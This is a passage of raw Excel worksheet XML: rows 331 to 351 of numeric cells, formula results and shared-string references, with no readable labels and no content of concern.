      <c r="J331" s="15"/>
      <c r="K331" s="29">
        <v>106285.0</v>
      </c>
      <c r="L331" s="15"/>
      <c r="M331" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N331" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O331" s="29">
        <v>1.0</v>
      </c>
      <c r="P331" s="29">
        <v>2.0</v>
      </c>
      <c r="Q331" s="15"/>
      <c r="R331" s="15"/>
      <c r="S331" s="15"/>
      <c r="T331" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U331" s="5"/>
      <c r="V331" s="5"/>
      <c r="W331" s="47"/>
      <c r="X331" s="45"/>
      <c r="Y331" s="45"/>
      <c r="Z331" s="38" t="s">
        <v>2074</v>
      </c>
      <c r="AA331" s="39" t="s">
        <v>2075</v>
      </c>
      <c r="AB331" s="38" t="s">
        <v>2076</v>
      </c>
      <c r="AC331" s="40">
        <v>183950.0</v>
      </c>
      <c r="AD331" s="5"/>
      <c r="AE331" s="14"/>
      <c r="AF331" s="14"/>
    </row>
    <row r="332">
      <c r="A332" s="6">
        <f t="shared" si="1"/>
        <v>0.3702110315</v>
      </c>
      <c r="B332" s="29">
        <v>1.0</v>
      </c>
      <c r="C332" s="15"/>
      <c r="D332" s="14"/>
      <c r="E332" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F332" s="14"/>
      <c r="G332" s="29">
        <v>67.0</v>
      </c>
      <c r="H332" s="29">
        <v>10681.0</v>
      </c>
      <c r="I332" s="29">
        <v>186301.0</v>
      </c>
      <c r="J332" s="15"/>
      <c r="K332" s="15"/>
      <c r="L332" s="15"/>
      <c r="M332" s="15"/>
      <c r="N332" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O332" s="29">
        <v>5.0</v>
      </c>
      <c r="P332" s="29">
        <v>14.0</v>
      </c>
      <c r="Q332" s="15"/>
      <c r="R332" s="15"/>
      <c r="S332" s="15"/>
      <c r="T332" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U332" s="5"/>
      <c r="V332" s="5"/>
      <c r="W332" s="47"/>
      <c r="X332" s="45"/>
      <c r="Y332" s="45"/>
      <c r="Z332" s="38" t="s">
        <v>2077</v>
      </c>
      <c r="AA332" s="39" t="s">
        <v>2078</v>
      </c>
      <c r="AB332" s="38" t="s">
        <v>2079</v>
      </c>
      <c r="AC332" s="40">
        <v>193393.0</v>
      </c>
      <c r="AD332" s="5"/>
      <c r="AE332" s="14"/>
      <c r="AF332" s="14"/>
    </row>
    <row r="333">
      <c r="A333" s="6">
        <f t="shared" si="1"/>
        <v>0.1439484408</v>
      </c>
      <c r="B333" s="29">
        <v>1.0</v>
      </c>
      <c r="C333" s="29">
        <v>153983.0</v>
      </c>
      <c r="D333" s="14"/>
      <c r="E333" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F333" s="14"/>
      <c r="G333" s="29">
        <v>1.0</v>
      </c>
      <c r="H333" s="29">
        <v>212.0</v>
      </c>
      <c r="I333" s="29">
        <v>83603.0</v>
      </c>
      <c r="J333" s="15"/>
      <c r="K333" s="29">
        <v>83603.0</v>
      </c>
      <c r="L333" s="15"/>
      <c r="M333" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N333" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O333" s="29">
        <v>1.0</v>
      </c>
      <c r="P333" s="29">
        <v>1.0</v>
      </c>
      <c r="Q333" s="15"/>
      <c r="R333" s="15"/>
      <c r="S333" s="15"/>
      <c r="T333" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U333" s="5"/>
      <c r="V333" s="5"/>
      <c r="W333" s="47"/>
      <c r="X333" s="45"/>
      <c r="Y333" s="45"/>
      <c r="Z333" s="38" t="s">
        <v>2080</v>
      </c>
      <c r="AA333" s="39" t="s">
        <v>2081</v>
      </c>
      <c r="AB333" s="38" t="s">
        <v>2082</v>
      </c>
      <c r="AC333" s="40">
        <v>153974.0</v>
      </c>
      <c r="AD333" s="5"/>
      <c r="AE333" s="14"/>
      <c r="AF333" s="14"/>
    </row>
    <row r="334">
      <c r="A334" s="6">
        <f t="shared" si="1"/>
        <v>0.9054225578</v>
      </c>
      <c r="B334" s="29">
        <v>1.0</v>
      </c>
      <c r="C334" s="15"/>
      <c r="D334" s="14"/>
      <c r="E334" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F334" s="14"/>
      <c r="G334" s="29">
        <v>2.0</v>
      </c>
      <c r="H334" s="29">
        <v>596.0</v>
      </c>
      <c r="I334" s="29">
        <v>83034.0</v>
      </c>
      <c r="J334" s="15"/>
      <c r="K334" s="29">
        <v>9792.0</v>
      </c>
      <c r="L334" s="15"/>
      <c r="M334" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N334" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O334" s="29">
        <v>5.0</v>
      </c>
      <c r="P334" s="29">
        <v>1.0</v>
      </c>
      <c r="Q334" s="15"/>
      <c r="R334" s="15"/>
      <c r="S334" s="15"/>
      <c r="T334" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U334" s="5"/>
      <c r="V334" s="5"/>
      <c r="W334" s="47"/>
      <c r="X334" s="45"/>
      <c r="Y334" s="45"/>
      <c r="Z334" s="38" t="s">
        <v>2083</v>
      </c>
      <c r="AA334" s="39" t="s">
        <v>2084</v>
      </c>
      <c r="AB334" s="38" t="s">
        <v>2085</v>
      </c>
      <c r="AC334" s="40">
        <v>96392.0</v>
      </c>
      <c r="AD334" s="5"/>
      <c r="AE334" s="14"/>
      <c r="AF334" s="14"/>
    </row>
    <row r="335">
      <c r="A335" s="6">
        <f t="shared" si="1"/>
        <v>0.1738157343</v>
      </c>
      <c r="B335" s="29">
        <v>1.0</v>
      </c>
      <c r="C335" s="29">
        <v>81933.0</v>
      </c>
      <c r="D335" s="14"/>
      <c r="E335" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F335" s="14"/>
      <c r="G335" s="29">
        <v>0.0</v>
      </c>
      <c r="H335" s="29">
        <v>155.0</v>
      </c>
      <c r="I335" s="29">
        <v>68554.0</v>
      </c>
      <c r="J335" s="15"/>
      <c r="K335" s="29">
        <v>5405.0</v>
      </c>
      <c r="L335" s="15"/>
      <c r="M335" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N335" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O335" s="29">
        <v>1.0</v>
      </c>
      <c r="P335" s="29">
        <v>2.0</v>
      </c>
      <c r="Q335" s="15"/>
      <c r="R335" s="15"/>
      <c r="S335" s="15"/>
      <c r="T335" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U335" s="5"/>
      <c r="V335" s="5"/>
      <c r="W335" s="47"/>
      <c r="X335" s="45"/>
      <c r="Y335" s="45"/>
      <c r="Z335" s="38" t="s">
        <v>2086</v>
      </c>
      <c r="AA335" s="39" t="s">
        <v>2087</v>
      </c>
      <c r="AB335" s="38" t="s">
        <v>2088</v>
      </c>
      <c r="AC335" s="40">
        <v>81932.0</v>
      </c>
      <c r="AD335" s="5"/>
      <c r="AE335" s="14"/>
      <c r="AF335" s="14"/>
    </row>
    <row r="336">
      <c r="A336" s="6">
        <f t="shared" si="1"/>
        <v>0.3850558203</v>
      </c>
      <c r="B336" s="29">
        <v>1.0</v>
      </c>
      <c r="C336" s="15"/>
      <c r="D336" s="14"/>
      <c r="E336" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F336" s="14"/>
      <c r="G336" s="29">
        <v>16.0</v>
      </c>
      <c r="H336" s="29">
        <v>153838.0</v>
      </c>
      <c r="I336" s="29">
        <v>77723.0</v>
      </c>
      <c r="J336" s="15"/>
      <c r="K336" s="29">
        <v>5405.0</v>
      </c>
      <c r="L336" s="15"/>
      <c r="M336" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N336" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O336" s="29">
        <v>2.0</v>
      </c>
      <c r="P336" s="29">
        <v>5.0</v>
      </c>
      <c r="Q336" s="15"/>
      <c r="R336" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S336" s="15"/>
      <c r="T336" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U336" s="5"/>
      <c r="V336" s="5"/>
      <c r="W336" s="47"/>
      <c r="X336" s="45"/>
      <c r="Y336" s="45"/>
      <c r="Z336" s="38" t="s">
        <v>2089</v>
      </c>
      <c r="AA336" s="39" t="s">
        <v>2090</v>
      </c>
      <c r="AB336" s="38" t="s">
        <v>2091</v>
      </c>
      <c r="AC336" s="40">
        <v>90589.0</v>
      </c>
      <c r="AD336" s="5"/>
      <c r="AE336" s="14"/>
      <c r="AF336" s="14"/>
    </row>
    <row r="337">
      <c r="A337" s="6">
        <f t="shared" si="1"/>
        <v>0.001520739613</v>
      </c>
      <c r="B337" s="29">
        <v>1.0</v>
      </c>
      <c r="C337" s="29">
        <v>211696.0</v>
      </c>
      <c r="D337" s="14"/>
      <c r="E337" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F337" s="14"/>
      <c r="G337" s="29">
        <v>16.0</v>
      </c>
      <c r="H337" s="29">
        <v>10508.0</v>
      </c>
      <c r="I337" s="29">
        <v>83281.0</v>
      </c>
      <c r="J337" s="15"/>
      <c r="K337" s="15"/>
      <c r="L337" s="15"/>
      <c r="M337" s="14"/>
      <c r="N337" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O337" s="29">
        <v>4.0</v>
      </c>
      <c r="P337" s="29">
        <v>15.0</v>
      </c>
      <c r="Q337" s="15"/>
      <c r="R337" s="15"/>
      <c r="S337" s="15"/>
      <c r="T337" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U337" s="5"/>
      <c r="V337" s="5"/>
      <c r="W337" s="45"/>
      <c r="X337" s="45"/>
      <c r="Y337" s="45"/>
      <c r="Z337" s="38" t="s">
        <v>2092</v>
      </c>
      <c r="AA337" s="39" t="s">
        <v>2093</v>
      </c>
      <c r="AB337" s="38" t="s">
        <v>2094</v>
      </c>
      <c r="AC337" s="40">
        <v>211693.0</v>
      </c>
      <c r="AD337" s="5"/>
      <c r="AE337" s="14"/>
      <c r="AF337" s="14"/>
    </row>
    <row r="338">
      <c r="A338" s="6">
        <f t="shared" si="1"/>
        <v>0.7877947461</v>
      </c>
      <c r="B338" s="29">
        <v>1.0</v>
      </c>
      <c r="C338" s="15"/>
      <c r="D338" s="14"/>
      <c r="E338" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F338" s="14"/>
      <c r="G338" s="29">
        <v>21.0</v>
      </c>
      <c r="H338" s="29">
        <v>5577.0</v>
      </c>
      <c r="I338" s="29">
        <v>125434.0</v>
      </c>
      <c r="J338" s="15"/>
      <c r="K338" s="29">
        <v>140214.0</v>
      </c>
      <c r="L338" s="15"/>
      <c r="M338" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N338" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O338" s="29">
        <v>4.0</v>
      </c>
      <c r="P338" s="29">
        <v>10.0</v>
      </c>
      <c r="Q338" s="15"/>
      <c r="R338" s="15"/>
      <c r="S338" s="15"/>
      <c r="T338" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U338" s="5"/>
      <c r="V338" s="5"/>
      <c r="W338" s="47"/>
      <c r="X338" s="45"/>
      <c r="Y338" s="45"/>
      <c r="Z338" s="38" t="s">
        <v>2095</v>
      </c>
      <c r="AA338" s="39" t="s">
        <v>2096</v>
      </c>
      <c r="AB338" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC338" s="40">
        <v>215871.0</v>
      </c>
      <c r="AD338" s="5"/>
      <c r="AE338" s="14"/>
      <c r="AF338" s="14"/>
    </row>
    <row r="339">
      <c r="A339" s="6">
        <f t="shared" si="1"/>
        <v>0.9123885856</v>
      </c>
      <c r="B339" s="29">
        <v>1.0</v>
      </c>
      <c r="C339" s="15"/>
      <c r="D339" s="14"/>
      <c r="E339" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F339" s="14"/>
      <c r="G339" s="29">
        <v>3.0</v>
      </c>
      <c r="H339" s="29">
        <v>2101.0</v>
      </c>
      <c r="I339" s="29">
        <v>50051.0</v>
      </c>
      <c r="J339" s="15"/>
      <c r="K339" s="15"/>
      <c r="L339" s="15"/>
      <c r="M339" s="14"/>
      <c r="N339" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O339" s="29">
        <v>1.0</v>
      </c>
      <c r="P339" s="29">
        <v>0.0</v>
      </c>
      <c r="Q339" s="15"/>
      <c r="R339" s="15"/>
      <c r="S339" s="15"/>
      <c r="T339" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U339" s="5"/>
      <c r="V339" s="5"/>
      <c r="W339" s="47"/>
      <c r="X339" s="45"/>
      <c r="Y339" s="45"/>
      <c r="Z339" s="38" t="s">
        <v>2097</v>
      </c>
      <c r="AA339" s="39" t="s">
        <v>2098</v>
      </c>
      <c r="AB339" s="38" t="s">
        <v>2038</v>
      </c>
      <c r="AC339" s="40">
        <v>62390.0</v>
      </c>
      <c r="AD339" s="5"/>
      <c r="AE339" s="14"/>
      <c r="AF339" s="14"/>
    </row>
    <row r="340">
      <c r="A340" s="6">
        <f t="shared" si="1"/>
        <v>0.3192389915</v>
      </c>
      <c r="B340" s="29">
        <v>1.0</v>
      </c>
      <c r="C340" s="15"/>
      <c r="D340" s="14"/>
      <c r="E340" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F340" s="14"/>
      <c r="G340" s="29">
        <v>4.0</v>
      </c>
      <c r="H340" s="29">
        <v>347.0</v>
      </c>
      <c r="I340" s="29">
        <v>222902.0</v>
      </c>
      <c r="J340" s="15"/>
      <c r="K340" s="15"/>
      <c r="L340" s="15"/>
      <c r="M340" s="15"/>
      <c r="N340" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O340" s="29">
        <v>0.0</v>
      </c>
      <c r="P340" s="29">
        <v>3.0</v>
      </c>
      <c r="Q340" s="15"/>
      <c r="R340" s="15"/>
      <c r="S340" s="15"/>
      <c r="T340" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U340" s="5"/>
      <c r="V340" s="5"/>
      <c r="W340" s="47"/>
      <c r="X340" s="45"/>
      <c r="Y340" s="45"/>
      <c r="Z340" s="38" t="s">
        <v>2099</v>
      </c>
      <c r="AA340" s="39" t="s">
        <v>2100</v>
      </c>
      <c r="AB340" s="38" t="s">
        <v>2101</v>
      </c>
      <c r="AC340" s="40">
        <v>222356.0</v>
      </c>
      <c r="AD340" s="5"/>
      <c r="AE340" s="14"/>
      <c r="AF340" s="14"/>
    </row>
    <row r="341">
      <c r="A341" s="6">
        <f t="shared" si="1"/>
        <v>0.7574590277</v>
      </c>
      <c r="B341" s="29">
        <v>1.0</v>
      </c>
      <c r="C341" s="15"/>
      <c r="D341" s="14"/>
      <c r="E341" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F341" s="14"/>
      <c r="G341" s="29">
        <v>1.0</v>
      </c>
      <c r="H341" s="29">
        <v>550.0</v>
      </c>
      <c r="I341" s="29">
        <v>98772.0</v>
      </c>
      <c r="J341" s="15"/>
      <c r="K341" s="29">
        <v>98772.0</v>
      </c>
      <c r="L341" s="15"/>
      <c r="M341" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N341" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O341" s="29">
        <v>0.0</v>
      </c>
      <c r="P341" s="29">
        <v>0.0</v>
      </c>
      <c r="Q341" s="15"/>
      <c r="R341" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S341" s="15"/>
      <c r="T341" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U341" s="5"/>
      <c r="V341" s="5"/>
      <c r="W341" s="47"/>
      <c r="X341" s="45"/>
      <c r="Y341" s="45"/>
      <c r="Z341" s="38" t="s">
        <v>2102</v>
      </c>
      <c r="AA341" s="39" t="s">
        <v>2103</v>
      </c>
      <c r="AB341" s="38" t="s">
        <v>2104</v>
      </c>
      <c r="AC341" s="40">
        <v>115785.0</v>
      </c>
      <c r="AD341" s="5"/>
      <c r="AE341" s="14"/>
      <c r="AF341" s="14"/>
    </row>
    <row r="342">
      <c r="A342" s="6">
        <f t="shared" si="1"/>
        <v>0.9614677156</v>
      </c>
      <c r="B342" s="29">
        <v>1.0</v>
      </c>
      <c r="C342" s="15"/>
      <c r="D342" s="14"/>
      <c r="E342" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F342" s="14"/>
      <c r="G342" s="29">
        <v>1.0</v>
      </c>
      <c r="H342" s="29">
        <v>332.0</v>
      </c>
      <c r="I342" s="29">
        <v>271120.0</v>
      </c>
      <c r="J342" s="15"/>
      <c r="K342" s="29">
        <v>271120.0</v>
      </c>
      <c r="L342" s="15"/>
      <c r="M342" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N342" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O342" s="29">
        <v>0.0</v>
      </c>
      <c r="P342" s="29">
        <v>2.0</v>
      </c>
      <c r="Q342" s="15"/>
      <c r="R342" s="15"/>
      <c r="S342" s="15"/>
      <c r="T342" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U342" s="5"/>
      <c r="V342" s="5"/>
      <c r="W342" s="47"/>
      <c r="X342" s="45"/>
      <c r="Y342" s="45"/>
      <c r="Z342" s="38" t="s">
        <v>2105</v>
      </c>
      <c r="AA342" s="39" t="s">
        <v>2106</v>
      </c>
      <c r="AB342" s="38" t="s">
        <v>2107</v>
      </c>
      <c r="AC342" s="40">
        <v>257779.0</v>
      </c>
      <c r="AD342" s="5"/>
      <c r="AE342" s="14"/>
      <c r="AF342" s="14"/>
    </row>
    <row r="343">
      <c r="A343" s="6">
        <f t="shared" si="1"/>
        <v>0.06238861672</v>
      </c>
      <c r="B343" s="29">
        <v>1.0</v>
      </c>
      <c r="C343" s="14"/>
      <c r="D343" s="14"/>
      <c r="E343" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F343" s="14"/>
      <c r="G343" s="29">
        <v>-1.0</v>
      </c>
      <c r="H343" s="29">
        <v>110.0</v>
      </c>
      <c r="I343" s="29">
        <v>62048.0</v>
      </c>
      <c r="J343" s="15"/>
      <c r="K343" s="29">
        <v>62048.0</v>
      </c>
      <c r="L343" s="15"/>
      <c r="M343" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N343" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O343" s="29">
        <v>1.0</v>
      </c>
      <c r="P343" s="29">
        <v>12.0</v>
      </c>
      <c r="Q343" s="15"/>
      <c r="R343" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S343" s="15"/>
      <c r="T343" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U343" s="5"/>
      <c r="V343" s="5"/>
      <c r="W343" s="47"/>
      <c r="X343" s="45"/>
      <c r="Y343" s="45"/>
      <c r="Z343" s="38" t="s">
        <v>2108</v>
      </c>
      <c r="AA343" s="39" t="s">
        <v>2109</v>
      </c>
      <c r="AB343" s="38" t="s">
        <v>2110</v>
      </c>
      <c r="AC343" s="40">
        <v>259517.0</v>
      </c>
      <c r="AD343" s="5"/>
      <c r="AE343" s="14"/>
      <c r="AF343" s="14"/>
    </row>
    <row r="344">
      <c r="A344" s="6">
        <f t="shared" si="1"/>
        <v>0.4530686208</v>
      </c>
      <c r="B344" s="29">
        <v>1.0</v>
      </c>
      <c r="C344" s="14"/>
      <c r="D344" s="14"/>
      <c r="E344" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F344" s="14"/>
      <c r="G344" s="29">
        <v>1.0</v>
      </c>
      <c r="H344" s="29">
        <v>673.0</v>
      </c>
      <c r="I344" s="15"/>
      <c r="J344" s="5" t="s">
        <v>2111</v>
      </c>
      <c r="K344" s="15"/>
      <c r="L344" s="15"/>
      <c r="M344" s="15"/>
      <c r="N344" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O344" s="29">
        <v>2.0</v>
      </c>
      <c r="P344" s="29">
        <v>2.0</v>
      </c>
      <c r="Q344" s="15"/>
      <c r="R344" s="15"/>
      <c r="S344" s="15"/>
      <c r="T344" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U344" s="5"/>
      <c r="V344" s="5"/>
      <c r="W344" s="47"/>
      <c r="X344" s="45"/>
      <c r="Y344" s="45"/>
      <c r="Z344" s="38" t="s">
        <v>2112</v>
      </c>
      <c r="AA344" s="39" t="s">
        <v>2113</v>
      </c>
      <c r="AB344" s="38" t="s">
        <v>1537</v>
      </c>
      <c r="AC344" s="40">
        <v>183132.0</v>
      </c>
      <c r="AD344" s="5"/>
      <c r="AE344" s="14"/>
      <c r="AF344" s="14"/>
    </row>
    <row r="345">
      <c r="A345" s="6">
        <f t="shared" si="1"/>
        <v>0.1702753896</v>
      </c>
      <c r="B345" s="29">
        <v>1.0</v>
      </c>
      <c r="C345" s="15"/>
      <c r="D345" s="14"/>
      <c r="E345" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F345" s="14"/>
      <c r="G345" s="29">
        <v>0.0</v>
      </c>
      <c r="H345" s="29">
        <v>426.0</v>
      </c>
      <c r="I345" s="29">
        <v>244642.0</v>
      </c>
      <c r="J345" s="15"/>
      <c r="K345" s="15"/>
      <c r="L345" s="15"/>
      <c r="M345" s="15"/>
      <c r="N345" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O345" s="29">
        <v>0.0</v>
      </c>
      <c r="P345" s="29">
        <v>2.0</v>
      </c>
      <c r="Q345" s="15"/>
      <c r="R345" s="15"/>
      <c r="S345" s="15"/>
      <c r="T345" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U345" s="5"/>
      <c r="V345" s="5"/>
      <c r="W345" s="47"/>
      <c r="X345" s="45"/>
      <c r="Y345" s="45"/>
      <c r="Z345" s="38" t="s">
        <v>2114</v>
      </c>
      <c r="AA345" s="39" t="s">
        <v>2115</v>
      </c>
      <c r="AB345" s="38" t="s">
        <v>2116</v>
      </c>
      <c r="AC345" s="40">
        <v>239952.0</v>
      </c>
      <c r="AD345" s="5"/>
      <c r="AE345" s="14"/>
      <c r="AF345" s="14"/>
    </row>
    <row r="346">
      <c r="A346" s="6">
        <f t="shared" si="1"/>
        <v>0.2662430994</v>
      </c>
      <c r="B346" s="29">
        <v>1.0</v>
      </c>
      <c r="C346" s="29">
        <v>240208.0</v>
      </c>
      <c r="D346" s="14"/>
      <c r="E346" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F346" s="14"/>
      <c r="G346" s="29">
        <v>1.0</v>
      </c>
      <c r="H346" s="29">
        <v>199.0</v>
      </c>
      <c r="I346" s="29">
        <v>236458.0</v>
      </c>
      <c r="J346" s="15"/>
      <c r="K346" s="15"/>
      <c r="L346" s="15"/>
      <c r="M346" s="14"/>
      <c r="N346" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O346" s="29">
        <v>2.0</v>
      </c>
      <c r="P346" s="29">
        <v>2.0</v>
      </c>
      <c r="Q346" s="15"/>
      <c r="R346" s="15"/>
      <c r="S346" s="15"/>
      <c r="T346" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U346" s="5"/>
      <c r="V346" s="5"/>
      <c r="W346" s="47"/>
      <c r="X346" s="45"/>
      <c r="Y346" s="45"/>
      <c r="Z346" s="38" t="s">
        <v>2117</v>
      </c>
      <c r="AA346" s="39" t="s">
        <v>2118</v>
      </c>
      <c r="AB346" s="38" t="s">
        <v>2119</v>
      </c>
      <c r="AC346" s="40">
        <v>240202.0</v>
      </c>
      <c r="AD346" s="5"/>
      <c r="AE346" s="14"/>
      <c r="AF346" s="14"/>
    </row>
    <row r="347">
      <c r="A347" s="6">
        <f t="shared" si="1"/>
        <v>0.9355872975</v>
      </c>
      <c r="B347" s="29">
        <v>1.0</v>
      </c>
      <c r="C347" s="29">
        <v>48178.0</v>
      </c>
      <c r="D347" s="14"/>
      <c r="E347" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F347" s="14"/>
      <c r="G347" s="29">
        <v>10.0</v>
      </c>
      <c r="H347" s="29">
        <v>12049.0</v>
      </c>
      <c r="I347" s="29">
        <v>764.0</v>
      </c>
      <c r="J347" s="15"/>
      <c r="K347" s="29">
        <v>76718.0</v>
      </c>
      <c r="L347" s="15"/>
      <c r="M347" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N347" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O347" s="29">
        <v>5.0</v>
      </c>
      <c r="P347" s="29">
        <v>5.0</v>
      </c>
      <c r="Q347" s="15"/>
      <c r="R347" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S347" s="15"/>
      <c r="T347" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U347" s="5"/>
      <c r="V347" s="5"/>
      <c r="W347" s="47"/>
      <c r="X347" s="45"/>
      <c r="Y347" s="45"/>
      <c r="Z347" s="38" t="s">
        <v>2120</v>
      </c>
      <c r="AA347" s="39" t="s">
        <v>2121</v>
      </c>
      <c r="AB347" s="38" t="s">
        <v>2122</v>
      </c>
      <c r="AC347" s="40">
        <v>48174.0</v>
      </c>
      <c r="AD347" s="5"/>
      <c r="AE347" s="14"/>
      <c r="AF347" s="14"/>
    </row>
    <row r="348">
      <c r="A348" s="6">
        <f t="shared" si="1"/>
        <v>0.3700441157</v>
      </c>
      <c r="B348" s="29">
        <v>1.0</v>
      </c>
      <c r="C348" s="14"/>
      <c r="D348" s="14"/>
      <c r="E348" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F348" s="14"/>
      <c r="G348" s="29">
        <v>4.0</v>
      </c>
      <c r="H348" s="29">
        <v>396.0</v>
      </c>
      <c r="I348" s="29">
        <v>971.0</v>
      </c>
      <c r="J348" s="15"/>
      <c r="K348" s="15"/>
      <c r="L348" s="15"/>
      <c r="M348" s="15"/>
      <c r="N348" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O348" s="29">
        <v>2.0</v>
      </c>
      <c r="P348" s="29">
        <v>1.0</v>
      </c>
      <c r="Q348" s="15"/>
      <c r="R348" s="15"/>
      <c r="S348" s="15"/>
      <c r="T348" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U348" s="5"/>
      <c r="V348" s="5"/>
      <c r="W348" s="47"/>
      <c r="X348" s="45"/>
      <c r="Y348" s="45"/>
      <c r="Z348" s="38" t="s">
        <v>2123</v>
      </c>
      <c r="AA348" s="39" t="s">
        <v>2124</v>
      </c>
      <c r="AB348" s="38" t="s">
        <v>2125</v>
      </c>
      <c r="AC348" s="40">
        <v>118072.0</v>
      </c>
      <c r="AD348" s="5"/>
      <c r="AE348" s="14"/>
      <c r="AF348" s="14"/>
    </row>
    <row r="349">
      <c r="A349" s="6">
        <f t="shared" si="1"/>
        <v>0.3061438212</v>
      </c>
      <c r="B349" s="29">
        <v>1.0</v>
      </c>
      <c r="C349" s="29">
        <v>85393.0</v>
      </c>
      <c r="D349" s="14"/>
      <c r="E349" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F349" s="14"/>
      <c r="G349" s="29">
        <v>16.0</v>
      </c>
      <c r="H349" s="29">
        <v>3278.0</v>
      </c>
      <c r="I349" s="29">
        <v>42517.0</v>
      </c>
      <c r="J349" s="15"/>
      <c r="K349" s="15"/>
      <c r="L349" s="15"/>
      <c r="M349" s="15"/>
      <c r="N349" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O349" s="29">
        <v>3.0</v>
      </c>
      <c r="P349" s="29">
        <v>3.0</v>
      </c>
      <c r="Q349" s="15"/>
      <c r="R349" s="15"/>
      <c r="S349" s="15"/>
      <c r="T349" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U349" s="5"/>
      <c r="V349" s="5"/>
      <c r="W349" s="47"/>
      <c r="X349" s="45"/>
      <c r="Y349" s="45"/>
      <c r="Z349" s="38" t="s">
        <v>2126</v>
      </c>
      <c r="AA349" s="39" t="s">
        <v>2127</v>
      </c>
      <c r="AB349" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC349" s="40">
        <v>85391.0</v>
      </c>
      <c r="AD349" s="5"/>
      <c r="AE349" s="14"/>
      <c r="AF349" s="14"/>
    </row>
    <row r="350">
      <c r="A350" s="6">
        <f t="shared" si="1"/>
        <v>0.2478547367</v>
      </c>
      <c r="B350" s="29">
        <v>1.0</v>
      </c>
      <c r="C350" s="29">
        <v>142454.0</v>
      </c>
      <c r="D350" s="14"/>
      <c r="E350" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F350" s="14"/>
      <c r="G350" s="29">
        <v>88.0</v>
      </c>
      <c r="H350" s="29">
        <v>13866.0</v>
      </c>
      <c r="I350" s="29">
        <v>17040.0</v>
      </c>
      <c r="J350" s="15"/>
      <c r="K350" s="29">
        <v>46319.0</v>
      </c>
      <c r="L350" s="15"/>
      <c r="M350" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N350" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O350" s="29">
        <v>1.0</v>
      </c>
      <c r="P350" s="29">
        <v>18.0</v>
      </c>
      <c r="Q350" s="15"/>
      <c r="R350" s="15"/>
      <c r="S350" s="15"/>
      <c r="T350" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U350" s="5"/>
      <c r="V350" s="5"/>
      <c r="W350" s="45"/>
      <c r="X350" s="45"/>
      <c r="Y350" s="45"/>
      <c r="Z350" s="38" t="s">
        <v>2128</v>
      </c>
      <c r="AA350" s="39" t="s">
        <v>2129</v>
      </c>
      <c r="AB350" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC350" s="40">
        <v>142450.0</v>
      </c>
      <c r="AD350" s="5"/>
      <c r="AE350" s="14"/>
      <c r="AF350" s="14"/>
    </row>
    <row r="351">
      <c r="A351" s="6">
        <f t="shared" si="1"/>
        <v>0.7995359583</v>
      </c>
      <c r="B351" s="29">
